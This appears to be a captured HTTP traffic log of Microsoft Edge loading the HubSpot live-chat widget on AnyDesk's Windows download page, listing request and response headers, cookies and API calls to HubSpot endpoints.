set-cookie: __cf_bm=sfB3pABd9h4jh8IpXKMSC697.mukUdC5lze14jZyAnU-1728144487-1.0.1.1-.uxTGg3sgOB2qHVsSbsLait5cdgZ5Yt.O7fIPlgZ9GFJFPD5let6Ig_D4BStAHh8qW5R6WGOhokpmNAWLfGQPw; path=/; expires=Sat, 05-Oct-24 16:38:07 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITKFFU0eRqFc6Nfn%2BCGcBuQrwKU0egxp9bFwzi7ns%2FbbH0TigMJPUknvZivcC5zjnnnRPJqkdi9axkxM4WDcUqW3wkSuWZ8wjhhGnc3nYcq9%2BffuGMGTiphIpEM53g7nVQme2A1MiNyE2H%2FTxO8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=qVodnkdsbdcigdwgKCxd0uStoEP0lTspN05.gzHhtFA-1728144487116-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab23c9030bad-AMS
content-encoding: br
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:07 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeab23d9270bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 29351119-453f-41af-be76-3f7e4a6acf88
set-cookie: __cf_bm=2i_sjruBPUl_VzzvV7ZrSRtZD.0kFPjsQ.cmyQT6O8I-1728144487-1.0.1.1-sWz1IIhZMAXtWWdCUdKEP7p8j4SGTH6Agg4SgJfOZAJ1VxWYcAC_7J8RFO_VLTsf9nHytNqNFMOVThMj_jYANA; path=/; expires=Sat, 05-Oct-24 16:38:07 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nIUahozRUP5s0sWiSwA2HJNl4sAjoHrPZgSW7KtUPkNlN7BMQd3phXQ9BMducBrgKmyyN2DokVK2Ic2Y5QAddZpV10gY%2BaYNm4jOqgm8vGiDU%2B1DL1bkQ0B37iEdBFtSfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=DKOWoc8d9aP1GKARfgdkS9sMg_H2YxmMI10za5BxMj0-1728144487137-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=32216ffab9654500808a6fcc397a1456&traceId=32216ffab9654500808a6fcc397a1456&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
x-hubspot-messages-uri: https://anydesk.com/en/downloads/windows
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:08 GMT
content-type: application/json;charset=utf-8
content-length: 1490
cf-ray: 8cdeab2c0bb40bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
cache-control: no-cache, no-store, no-transform, must-revalidate, max-age=0
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 215a446a-531f-479b-a0e2-9ef99cb9ee95
set-cookie: __cf_bm=LLZBGIhFcfzbLYm0P1FMsft.YFB4bwKo4Wp7h29HNyA-1728144488-1.0.1.1-V__2RL6KBN0_huC4BMBqTIMgJwcmG6DM6Zd0Tvl1ngMLXHo2WB4pj4QByRsUPzKXnQYLNse1kGsFALbHz0F4FA; path=/; expires=Sat, 05-Oct-24 16:38:08 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q9n3AypKGElFKuXz8l510tphVd216Lv4lDbXsOtt%2F%2B08tXY8c0SMantnc6Aqa14Ix0Ii5shr4RKpMHS%2B1bq4jpm1M4gZCgLdvutP05BUHJMDhJi5jL8BRMmOeup0EPy%2BkA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=CDXw8DqP9gsoDNoC6aqbjnbViubjn5j1ypugxoawIvE-1728144488606-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:09 GMT
content-type: text/html; charset=utf-8
cf-ray: 8cdeab319a4b0bad-AMS
cf-cache-status: DYNAMIC
age: 2266
cache-control: max-age=600
content-encoding: gzip
etag: W/"92cfcc4f73d45a74e3aa5782ce9dc842"
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
via: 1.1 9dc566ff42777d2cad8483451738f334.cloudfront.net (CloudFront)
access-control-allow-credentials: false
cache-tag: staticjsapp-conversations-visitor-ui-web-prod,staticjsapp-prod
content-security-policy-report-only: script-src 'self' www.hubspot.com *.hsappstatic.net *.hs-analytics.net *.hs-banner.com *.hsforms.net *.hsleadflows.net *.hs-scripts.com *.hubspotfeedback.com *.usemessages.com js.hubspot.com *.hsadspixel.net *.hscollectedforms.net js-agent.newrelic.com bam.nr-data.net bam-cell.nr-data.net *.google-analytics.com www.googletagmanager.com data: 'unsafe-inline' 'unsafe-eval' blob: connect.facebook.net www.gstatic.cn www.gstatic.com www.google.com www.recaptcha.net *.fullstory.com fullstory.com apis.google.com snap.licdn.com; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-visitor-ui/static-1.20626/html/index.html&cfRay=8cdeab319a4b0bad&reqUrl=https%3A%2F%2Fapp.hubspot.com%2Fconversations-visitor%2F7940397%2Fthreads%2Futk%2F32216ffab9654500808a6fcc397a1456%3Fuuid%3D9e33b42b69f64057b0552d17bf1c7d4f%26mobile%3Dfalse%26mobileSafari%3Dfalse%26hideWelcomeMessage%3Dfalse%26hstc%3D261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1%26domain%3Danydesk.com%26inApp53%3Dfalse%26messagesUtk%3D32216ffab9654500808a6fcc397a1456%26url%3Dhttps%253A%252F%252Fanydesk.com%252Fen%252Fdownloads%252Fwindows%26inline%3Dfalse%26isFullscreen%3Dfalse%26globalCookieOptOut%3D%26isFirstVisitorSession%3Dtrue%26isAttachmentDisabled%3Dfalse%26isInitialInputFocusDisabled%3Dfalse%26enableWidgetCookieBanner%3Dfalse%26isInCMS%3Dfalse%26hideScrollToButton%3Dtrue%26isIOSMobile%3Dfalse%26hubspotUtk%3Da5b3d1933284be27e3a7527fad5a6a3f&referrer=https%3A%2F%2Fanydesk.com%2F&cfenv=prod&pdt=2024-10-05&csp=ro
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://send.hsbrowserreports.com/csp/reports"}]}
reporting-endpoints: default="https://send.hsbrowserreports.com/csp/reports?cfRay=8cdeab319a4b0bad&resource=conversations-visitor-ui/static-1.20626/html/index.html"
x-amz-cf-id: QSeHQ_BAxTFa2uss82jSgN4GG4Kvz5S9lHCzbSmquZfGgJ6mvuI8tg==
x-amz-cf-pop: IAD12-P3
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-version-id: hVkVcK8l8m_IHBKUGh9hahU3mPpZRmCl
x-cache: Hit from cloudfront
x-content-type-options: no-sniff
x-envoy-upstream-service-time: 5
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-67km9
x-evy-trace-virtual-host: all
x-hs-cache-status: MISS
x-hs-target-asset: conversations-visitor-ui/static-1.20626/html/index.html
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 0ae807bc-5cae-43d4-9048-b5c74a6ac92e
x-request-id: 0ae807bc-5cae-43d4-9048-b5c74a6ac92e
set-cookie: __cf_bm=w9vHBhyN6udI1Sb4cMeb2XIOmbNvCdKT53XrUm7uLqA-1728144489-1.0.1.1-0jwDPDu0bbQwgFe6tuLiMUpYtyxZY2GVn3R4y68OWZWgwdzsSQQO4NRTlqEhwjWfG7mPb3z5mznrlSNNEbKHmg; path=/; expires=Sat, 05-Oct-24 16:38:09 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
set-cookie: _cfuvid=N.d9jC27eIyJXYIDUAUBukj5tT8lqgjmyVIhw7Zc1Rs-1728144489431-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2375
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:10 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 12
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 112e2e06-a221-4f08-8250-11ac2600ec73
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-jxjp2
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 112e2e06-a221-4f08-8250-11ac2600ec73
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=5G4X95RZmWhrp38TRjNABhtY2hhG.Vej.VTEny2JW2E-1728144490-1.0.1.1-Svca0keuQFqvLwWuinQCvzWpC0pAaOhKRw70wlokvmhDPgZuw2uM6501rYuqq4o.Ec5MBSRURFHNYSnlV9UNlw; path=/; expires=Sat, 05-Oct-24 16:38:10 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XM7uTwG6otAIkGsdxyJ68iDf0tyM%2FjG1h0tq0hZ0epVAc5IEnOqbCuZcXGUScluXRToMPb3Kr6OJTmp6DtejvoWgyOHWoYjrhXfWY%2FUfyoyjiU7PAfjuTaZJXlhd%2FYaB1Zq7ZxF9F8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=xYfzluuv5PRJoiokPTbMtIz67H00hcb33MEzoLJ95Ro-1728144490775-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab3a9f1c0bad-AMS
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2068
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:10 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 16
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 3c219980-34b0-4ef6-af9c-c8a33e798c82
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-hkrfs
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 3c219980-34b0-4ef6-af9c-c8a33e798c82
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=RmbMEbcBVEaxJJX0MQvTjGSRQ1uCqOXCtJGydWBR770-1728144490-1.0.1.1-t6JyvvJok2p53x9k_VMNc0q5voev_FTfnQQeAFhw7OadRIMj4wa0ClfsGZI0aaEPyLsb_sRvPSf_kSGKKYnPnQ; path=/; expires=Sat, 05-Oct-24 16:38:10 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKvX1EHSpU%2Fdn1EnSBFiUasdFL2RcGQJ8Z%2FK%2Bmm3DAm8tUppU8%2FF6u9NDdmBQYUfKFgLyshduohm06%2Fz4cIevGa0E%2FzKq0XpSfKQThtpiPSo%2BtS%2BWXRiy3faFoQo66McSb8JzS1PsCs%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=q3jFjObc4OUOB9nSBMs0SlULF86_EBUmJhuk2UPAXog-1728144490822-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab3a9f1e0bad-AMS
POST

https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 406
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/32216ffab9654500808a6fcc397a1456?uuid=9e33b42b69f64057b0552d17bf1c7d4f&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=32216ffab9654500808a6fcc397a1456&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:10 GMT
cf-ray: 8cdeab3aef820bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=7e68501c-92dd-49af-94e5-ac645e0c3a2d
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 7e68501c-92dd-49af-94e5-ac645e0c3a2d
set-cookie: __cf_bm=zLc7XPW51CNn1u3KeUFUPRW8a6i56Lb_RVAHvNesJdI-1728144490-1.0.1.1-iCC6f1I4zMPi6s2_8xst6QmoyUBAafK3KUCXLMrKKYvgpFYXpFZUB4jMtdQ3rnTtsuHimaxWzgc1_Gk9pMjJ0A; path=/; expires=Sat, 05-Oct-24 16:38:10 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MIBNpLrIrtJSji58movJUwxpurbN%2FbWyb1H6KE%2FgkfyeGEsp6VhBWvwvW64TEIQPKdhDASaVcd3sYWbZ726SbSfTO7F7%2BTCNXCk76X7g4fpbreDLzzkPnjRX7FCvLqWW%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=TH4_ovUF9aLXRosYKy_OrGyITKJo9HnUpYXwmyA7qmQ-1728144490877-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=32216ffab9654500808a6fcc397a1456&sessionId=AMOaWbL1L8OpPyTgdta4QgBD_o5KdDzbrK4fqCIHkP4RRmkD--pJrpvnemxkZYbUObbCRlileWx9WhliMvJSuVJG_RZENoQZ6R9DFhUtjOZR1kHqu2kvbzz4KFxfR1XMWQFujL8yGFrIvq1Z-JONsym3Txq5dBPKKzF78nEVsnWbCtffnpqKUOU&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=32216ffab9654500808a6fcc397a1456&sessionId=AMOaWbL1L8OpPyTgdta4QgBD_o5KdDzbrK4fqCIHkP4RRmkD--pJrpvnemxkZYbUObbCRlileWx9WhliMvJSuVJG_RZENoQZ6R9DFhUtjOZR1kHqu2kvbzz4KFxfR1XMWQFujL8yGFrIvq1Z-JONsym3Txq5dBPKKzF78nEVsnWbCtffnpqKUOU&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json, text/javascript, */*; q=0.01
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
